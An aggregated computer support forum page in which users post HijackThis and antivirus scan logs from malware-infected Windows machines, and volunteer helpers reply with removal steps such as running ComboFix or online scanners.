Computer Support Forum

It just keeps coming back.....

Question: It just keeps coming back.....

2 nights ago I was surfing the net and I started getting reports such as:

Windows has detected spyware infection!
It is recomended to use special antispyware tools to prevent data loss. Windows will now download and install the most up-to-date antispyware for you
Click here to protect your computer from spyware!

and

Warning! Potential Spyware Operation!
Your computer is making unauthorized copies of your system and
Internet files. Run full scan now to pervent any unathorised access
to your files! Click here to download spyware remover ...

I started getting a lot of popups trying to send me to a site called cookingluck (f3.cookingluck.com, f5.cookingluck.com, f7.cookingluck.com, f9.cookingluck.com). I close them before they can finish loading.

Now I didn't do the smartest thing and I downloaded one of the "anti-spyware" things they told me to, "system-defender". Well, that's about when everything went from bad to worse: shell.dll was giving me hell, wowfax.dll was messing up. The control panel icon also disappeared and anything I tried to do with the system it wouldn't let me, pretty much telling me I didn't have administrative privileges.

So I came on this site and saw the self help page and was looking it over and saw that the "SmitFraud and It's Variants Removal Instructions" section fit my problem to a T, so I followed the steps exactly as they are written. I also got rid of the system defender. When I rebooted into normal Windows it seemed like everything was back to normal. I ran the AVG scan and it found a bunch of files. I did as the instructions told me, then I tried to run the Panda scan and it didn't work for some reason, but me being not the smartest thought it was OK. About 30 minutes later the same error messages started popping back up. It was back... just like it had never left, so I went through the instructions again, but this time it let me go through the Panda scan and there is still stuff... so here I am.

I tried to run the Deckard's system scanner but it gives me an error message halfway through and won't finish, so I am going to just post HJT in its stead... thank you in advance.

I did the 5 steps I was supposed to, best I could, and I am going to post those logs along with the logs from my cleaning the system the second time.

OK, first the HJT scan:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:17:52 AM, on 2/14/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\drivers\spool.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\RunDLL32.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R3 - URLSearchHook: AOLSearchHook Class - {54EB34EA-E6BE-4CFD-9F4F-C4A0C2EAFA22} - C:\Program Files\AOL Search\AOLSearch.dll
R3 - URLSearchHook: AOLTBSearch Class - {EA756889-2338-43DB-8F07-D1CA6FB9C90D} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: AOL Search Enhancement - {54EB34EA-E6BE-4CFD-9F4F-C4A0C2EAFA22} - C:\Program Files\AOL Search\AOLSearch.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: Symantec Intrusion Prevention - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\PROGRA~1\COMMON~1\SYMANT~1\IDS\IPSBHO.dll
O2 - BHO: AOL Toolbar Launcher - {7C554162-8CB7-45A4-B8F4-8EA1C75885F9} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.1121.2472\swg.dll
O2 - BHO: C:\WINDOWS\system32\Hfkr4g.dll - {B5AF0562-94F3-42BD-F434-2604812C797D} - C:\WINDOWS\system32\Hfkr4g.dll (file missing)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: AIM Toolbar - {DE9C389F-3316-41A7-809B-AA305ED9D922} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [SMSERIAL] C:\Program Files\Motorola\SMSERIAL\sm56hlpr.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [jkdfj94kgdftdf] C:\WINDOWS\TEMP\winlogan.exe
O4 - HKLM\..\Run: [autoload] C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
O4 - HKLM\..\Run: [Salestart] "C:\Program Files\Common Files\AVSystemCare\bm.exe" dm=http://avsystemcare.com; ad=http://avsystemcare.com
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [isCfgWiz] "C:\Program Files\Common Files\Symantec Shared\OPC\{C86EA115-FACD-4aa8-BFA2-398C677D0936}\SYMCUW.exe" -G:{77CCBE0B-A541-49a9-883E-14F8337EC861} -T:Config -REBOOT
O4 - HKLM\..\Run: [osCheck] "C:\Program Files\Norton Internet Security\osCheck.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Gsfjefefue9fidjfod] C:\DOCUME~1\JONATH~1\LOCALS~1\Temp\lsass.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe
O4 - HKCU\..\Run: [autoload] C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Application Data\cftmon.exe
O4 - HKUS\S-1-5-18\..\Run: [Microsoft hren1] C:\WINDOWS\mmhren1.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [jkdfj94kgdftdf] C:\WINDOWS\TEMP\winlogan.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [Spoolsv] C:\WINDOWS\system32\spoolvs.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\cftmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\spool.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Microsoft hren1] C:\WINDOWS\mmhren1.exe (User 'Default user')
O4 - Global Startup: HotKeyDetect.lnk = C:\WINDOWS\HotKeyDetect.exe
O8 - Extra context menu item: &AOL Toolbar Search - c:\program files\aol\aim toolbar 5.0\resources\en-US\local\search.html
O9 - Extra button: AIM Toolbar - {3369AF0D-62E9-4bda-8103-B4C75499B578} - C:\Program Files\AOL\AIM Toolbar 5.0\aoltb.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188638241765
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} (FlashXControl Object) - https://register3.valueactive.com/mp...CX/FlashAX.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\WINDOWS\system32\wowfx.dll
O20 - Winlogon Notify: LogCrypt - C:\WINDOWS\SYSTEM32\LogCrypt.dll
O20 - Winlogon Notify: partnershipreg - C:\Documents and Settings\All Users\Documents\Settings\partnership.dll
O21 - SSODL: VolumePrx - {3bf84ded-967c-4037-a4b9-affe81c800f6} - C:\WINDOWS\Installer\{3bf84ded-967c-4037-a4b9-affe81c800f6}\VolumePrx.dll
O21 - SSODL: zip - {9f1d9acb-d2d1-4832-a990-e9f1f90d5747} - C:\WINDOWS\Installer\{9f1d9acb-d2d1-4832-a990-e9f1f90d5747}\zip.dll
O22 - SharedTaskScheduler: JGhsdk393ktrfggh9dtj - {B5AF0562-94F3-42BD-F434-2604812C797D} - C:\WINDOWS\system32\Hfkr4g.dll (file missing)
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: BlueSoleil Hid Service - Unknown owner - C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe (file missing)
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: COM Host (comHost) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe
O23 - Service: Google Online Search Service - Unknown owner - C:\WINDOWS\system32\winlagons.exe (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE
O23 - Service: LiveUpdate Notice - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe (file missing)
O23 - Service: PnkBstrB - Unknown owner - C:\WINDOWS\system32\PnkBstrB.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\spool.exe
O23 - Service: Symantec Core LC - Unknown owner - C:\PROGRA~1\COMMON~1\SYMANT~1\CCPD-LC\symlcsvc.exe
O23 - Service: Viewpoint Manager Service - Unknown owner - C:\Program Files\Viewpoint\Common\ViewpointService.exe (file missing)

--
End of file - 11634 bytes



The latest scan from AVG:


---------------------------------------------------------
AVG Anti-Spyware - Scan Report
---------------------------------------------------------

+ Created at: 5:02:37 AM 2/14/2008

+ Scan result:



Nothing found.



::Report end


The report from Smitfraudfix:


SmitFraudFix v2.288

Scan done at 4:37:10.96, Thu 02/14/2008
Run from C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in safe mode

???????????????????????? SharedTaskScheduler Before SmitFraudFix
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
"{B5AF0562-94F3-42BD-F434-2604812C797D}"="JGhsdk393ktrfggh9dtj"

[HKEY_CLASSES_ROOT\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"


???????????????????????? Killing process


???????????????????????? hosts


???????????????????????? VACFix

VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


???????????????????????? Winsock2 Fix

S!Ri's WS2Fix: LSP not Found.


???????????????????????? Generic Renos Fix

GenericRenosFix by S!Ri


???????????????????????? Deleting infected files


???????????????????????? IEDFix

IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


???????????????????????? DNS

HKLM\SYSTEM\CCS\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS1\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS3\Services\Tcpip\..\{573AD9E6-5610-44A3-8157-F18B092F1D42}: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CCS\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS1\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1
HKLM\SYSTEM\CS3\Services\Tcpip\Parameters: DhcpNameServer=192.168.0.1


???????????????????????? Deleting Temp Files


???????????????????????? Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


???????????????????????? Registry Cleaning

Registry Cleaning done.

???????????????????????? SharedTaskScheduler After SmitFraudFix
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
"{B5AF0562-94F3-42BD-F434-2604812C797D}"="JGhsdk393ktrfggh9dtj"

[HKEY_CLASSES_ROOT\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5AF0562-94F3-42BD-F434-2604812C797D}\InProcServer32]
@="C:\WINDOWS\system32\Hfkr4g.dll"



???????????????????????? End


And last but not least the Panda Active Scan:



Incident Status Location

Virus:Trj/Downloader.SIA Disinfected Operating system
Virus:Trj/Agent.IAB Disinfected Operating system
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\findfast.exe
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Application Data\printer.exe
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Cookies\jonathan [email protected][1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\Process.exe
Virus:Trj/Rebooter.J Disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\Reboot.exe
Potentially unwanted tool:Application/SuperFast Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Desktop\SmitfraudFix\restart.exe
Adware:Adware/SystemDefender Not disinfected C:\Documents and Settings\Jonathan Mcconnell\Local Settings\Temporary Internet Files\Content.IE5\K3MNUVQ3\1202951000[1].exe
Virus:Trj/Downloader.SIA Disinfected C:\Documents and Settings\Jonathan Mcconnell\msftp.dll
Adware:Adware/VirusAlarma Not disinfected C:\Documents and Settings\LocalService\Application Data\printer.exe
Virus:Trj/Downloader.SIA Disinfected C:\Documents and Settings\LocalService\msftp.dll
Virus:Trj/Spammer.AGB Disinfected C:\E.tmp
Adware:Adware/SystemDefender Not disinfected C:\Program Files\tmp150515.exe
Virus:Rootkit/Nuwar.QJ Disinfected C:\WINDOWS\system32\diperto45a9-1e5e.sys
Virus:Rootkit/Spammer.AGA Disinfected C:\WINDOWS\system32\drivers\Lrx16.sys
Virus:Trj/Agent.IAB Disinfected C:\WINDOWS\system32\LogCrypt.dll
Virus:Trj/Downloader.SIA Disinfected C:\WINDOWS\system32\msftp.dll
Virus:Trj/Inject.Y Disinfected C:\WINDOWS\system32\tcpconn.exe







Once again thank you for looking into this

Answer: It just keeps coming back.....

Hi and welcome to TSF.

My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.
We'll begin with ComboFix. Please visit this webpage for download links, and instructions for running the tool: http://www.bleepingcomputer.com/comb...o-use-combofix
When the tool is finished, it will produce a report for you.
Please post C:\ComboFix.txt along with a new HijackThis log so we may continue cleaning the system.

NOTE: Combofix prevents autorun of all CDs, floppies and USB devices to assist with malware removal & increase security. If this is an issue or makes it difficult for you - please let me know.

12 more replies
Relevance 55.35%

I've been having a problem with the back left corner hinge since October of last year. I posted to another board about this problem, having been told that this issue would be passed on to support in my region. I'm curious as to whether I'll hear from these people in this lifetime or the next. I enjoy my laptop and would like to continue using it, but as time goes on it keeps separating more and more and I have to snap it back into place to keep it together. I'm hoping to actually hear back from someone this time that will be able to help me in fixing this issue.

Answer:Back Corner coming from the back left side by the hinge

@jmb1313

 

I have brought your issue to the attention of an appropriate team within HP. They will likely request information from you in order to look up your case details or product serial number. Please look for a private message from an identified HP contact. Additionally, keep in mind not to publicly post personal information (serial numbers and case details).

If you are unfamiliar with how the Forum's private message capability works, you can learn about that here.

Thank you for visiting the HP Support Forum.

1 more replies
Relevance 53.71%

I already posted in How to remove Windows 10 upgrade updates in Windows 7 and 8
In this thread after the starting post from Tookeri other updates that had to be deleted were mentioned. I made a list in post 841
I did not have all these updates on the pc but those that were on it I hid.
Some of them came back and I hid them again.
Now today they are back - with some that I had not seen before.

I made an attachment that shows them and also shows that I hid them again

Will I have to check Windows Update for the rest of my life?????

More replies
Relevance 52.89%

Hello,
I have a problem, which I've tried to fix several times but it keeps coming back.
This virus is located in Systems 32 folder, Pc Cillin 2005 identified it as TROJ_ROOTKIN.N. I've gone to safe mode, deleted it, returned to Windows and the virus reappeared; what's more, it clogs up Pc Cillin, so now under quarantine I have 100+ instances of this virus, and it's increasing.
The virus is labelled hpr34k8

I'm sure my Hijack Log is fairly clean... -------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 5:27:53 PM, on 14/08/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\RunDll32.exe
C:\WINDOWS\System32\RUNDLL32.EXE
C:\Program Files\Trend Micro\Internet Security 2005\pccguide.exe
C:\Program Files\Telstra\Cable Login\bpcable.exe
C:\Program Files\Netropa\Multimedia Keyboard\MMKeybd.exe
C:\Program Files\D-Tools\daemon.exe
C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe
C:\Program Files\Telstra\Toolbar\bpumTray.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
C:\Program Files\Winamp\winampa.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin... Read more

Answer:Virus that keeps coming back and back and back, so on

bump, hopefully someone takes notice

19 more replies
Relevance 49.2%

I am trying to clean out a co-worker's computer. I have restored to over a month ago and continue to find malware during scans. Any help appreciated. Have not yet restarted to fully remove. Do I need to kill some files with killbox prior to the restart? Thanks, Jeff

Malwarebytes' Anti-Malware 1.45
www.malwarebytes.org

Database version: 3930

Windows 6.0.6001 Service Pack 1
Internet Explorer 7.0.6001.18000

3/31/2010 2:19:22 PM
mbam-log-2010-03-31 (14-19-22).txt

Scan type: Full scan (C:\|)
Objects scanned: 231065
Time elapsed: 1 hour(s), 11 minute(s), 19 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 5

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
C:\Windows\System32\config\systemprofile\AppData\Roaming\AntiVirus Plus (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.

Files Infected:
C:\$Recycle.Bin\S-1-5-21-2658977195-169558386-357108580-1000\$RR7NTAN.tmp (Trojan.Agent.Gen) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\avp.ico (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Wi... Read more

Answer:ave.exe keeps coming back

Windows restarted for updates while sleeping last night. Running malwarebytes again. Final rid of Hijackthis entries
O20 - AppInit_DLLs: C:\ProgramData\nuvanifi\nuvanifi.dll
2658977195-169558386-357108580-1000

Malwarebytes came out clean as well as a full McAfee virus scan. Hijackthis log appears clean too. With persistence I think I have this cleaned finally. I have both a dds scan and gmer report but don't really know what to look for. I can post these if someone has time to review them. I ran both prior to the Windows update restart. Also updated and ran spywareblaster. Pop ups and redirects are gone too.

Partial log of items cleaned.
3/31/2010 2:19:22 PM
mbam-log-2010-03-31 (14-19-22).txt

Folders Infected:
C:\Windows\System32\config\systemprofile\AppData\Roaming\AntiVirus Plus (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.

Files Infected:
C:\$Recycle.Bin\S-1-5-21-2658977195-169558386-357108580-1000\$RR7NTAN.tmp (Trojan.Agent.Gen) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\avp.ico (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\AntiVirus Plus.lnk (Rogue.AntiVirusPlus) -> Quarantined and deleted successfully.
C:\Windows\System32\config\systemprofile\Local Settings\Application Data\ave.exe (Rogue.MultipleAV) -> Quarantined and deleted successfully.
C:\Windows\System32\co... Read more

1 more replies
Relevance 49.2%

I am having trouble getting rid of this BHO object. Every time I manage to remove the dll and the BHO registry entry it comes back under a different name. I have run Spybot, AdAware and Trend Micro AV. Any help would be appreciated.

Logfile of HijackThis v1.99.1
Scan saved at 3:17:14 PM, on 04/16/07
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
C:\WINDOWS\system32\fxssvc.exe
C:\Program Files\Trend Micro\OfficeScan Client\OfcPfwSvc.exe
C:\WINDOWS\TEMP\EWE594.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files ... Read more

Answer:Bho Keeps Coming Back

Hello EBurritt, I am SifuMike and I will be helping you.

Disable your antivirus program and go here http://www.bitdefender.com/scan8/ie.html and run an online scan with BitDefender (you will need to use Internet Explorer for this scan). When the ActiveX Control has loaded, click on "Click here to scan". Please be patient, as this scan may take a few hours. It all depends on the number of files on your computer. When BitDefender completes the scan, select the "Detected Problems" tab. Click on "Click here to export scan". Save the file as an HTML to your Desktop. Then click on the saved file and allow it to open with your browser. Go to Edit - Select All then copy/paste that log back here. Post the BitDefender log.

******************

Download ATF (Atribune Temp File) Cleaner? by Atribune DO NOT run it yet.

Download and install AVG Anti-Spyware 7.5 (formerly Ewido) This is a 30 day trial of the program

AVG Anti-Spyware is designed to be used to both scan for and remove malicious files and also to run in real-time alongside, but not replace, your existing anti-virus program to give an added layer of protection.

Both the Resident Shield and Automatic Updates will only be available for the thirty day trial period, after that AVG Anti-Spyware will revert to a stand-alone scanner which you can keep and manually update for free and use in a similar way to Ad-Aware SE Personal, Spybot S&D etc.

1. After download, double click on the file to launch the... Read more

11 more replies
Relevance 49.2%

Hello
For many years I succeeded in keeping my computers safe - then, not even a month ago, something surfaced. A Virut thing after I visited an insecure site.
If this can help, a few days before I had for the first time in my PC life installed a downloader program called Flashget.
